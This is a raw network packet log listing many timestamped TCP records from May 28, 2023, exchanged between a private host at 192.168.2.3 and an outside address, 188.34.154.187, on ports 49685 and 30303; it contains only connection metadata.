May 28, 2023 10:46:23.369218111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369226933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369229078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369246006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369266033 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369267941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369286060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369306087 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369324923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369344950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369365931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369386911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369406939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369429111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369448900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369471073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369492054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369510889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369532108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369551897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369571924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369590998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369610071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369630098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369649887 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369671106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369693041 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369714022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369736910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369757891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369781017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369798899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369807005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369820118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369822025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.369841099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369860888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369883060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369901896 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369921923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369942904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369961977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.369982958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370003939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370023966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370044947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370062113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370065928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370088100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370093107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370107889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370115995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370130062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370146036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370150089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370165110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370171070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370182991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370193958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370198965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370214939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370224953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370235920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370245934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370260000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370261908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370280027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370290041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370301962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370302916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370321989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370333910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370342016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370349884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370364904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370367050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370399952 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370419025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370476007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370496035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370513916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370528936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370533943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.370548964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370563030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.370583057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374134064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374171972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374192953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374217033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374228001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374248028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374265909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374270916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374294043 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374300957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374310017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374321938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374340057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374341965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374361038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374378920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374392986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374413013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374433994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374438047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374454975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374464989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374473095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374502897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374502897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374541044 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374557018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374576092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374593973 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374615908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374679089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374720097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374767065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374787092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374806881 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374808073 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374825001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374838114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374844074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374875069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374880075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.374922037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.374960899 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.375000954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.375081062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.375102043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.375121117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.375140905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379246950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379271030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379317999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379338026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379339933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379359961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379380941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379385948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379401922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379409075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379431009 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379450083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.379959106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.379997015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380016088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380042076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380068064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380104065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380109072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380125999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380143881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380167961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380364895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380386114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.380415916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.380439997 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385371923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385406971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385432005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385458946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385467052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385484934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385488033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385488033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385512114 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385513067 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385536909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385539055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385565996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385565996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385592937 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385593891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385612965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385618925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385644913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385670900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385672092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385672092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385691881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385696888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385715961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385725021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385746956 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385752916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385771990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385780096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385798931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385807037 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385828972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385834932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385857105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385863066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385880947 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385889053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385910034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385916948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385940075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385945082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385970116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385972977 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.385996103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.385996103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386018038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386023045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386044025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386049032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386070967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386076927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386097908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386104107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386128902 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386132002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386152983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386159897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386178017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386184931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386205912 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386212111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386233091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386239052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386266947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386267900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386286974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386293888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386317015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386318922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386347055 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386352062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386369944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386380911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386399031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386406898 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386430979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386432886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386452913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386461973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386482954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386488914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386508942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386516094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386538029 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386543036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386560917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386569977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386585951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386596918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386622906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386647940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386650085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386650085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386668921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386674881 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386699915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386699915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386724949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386728048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386748075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386754990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386775017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386781931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386806965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386809111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386830091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386836052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386856079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386863947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386883974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386892080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386909962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386919022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386940002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386945963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386966944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.386971951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.386993885 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387000084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387022018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387027979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387048006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387056112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387077093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387083054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387109995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387109995 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387130022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387135983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387159109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387162924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387188911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387191057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387216091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387217999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387237072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387244940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387267113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387269974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387290001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387296915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387319088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387324095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.387345076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387372017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387496948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.387722969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392453909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392515898 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392584085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392610073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392632008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392635107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392652035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392663002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392678976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392690897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392707109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392716885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392733097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392745972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392760992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392772913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392798901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392823935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392827034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392827034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392849922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392859936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392877102 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392883062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392904997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392925024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392925024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392930984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392951012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392957926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.392976999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.392986059 CEST	30303	49685	188.34.154.187	192.168.2.3
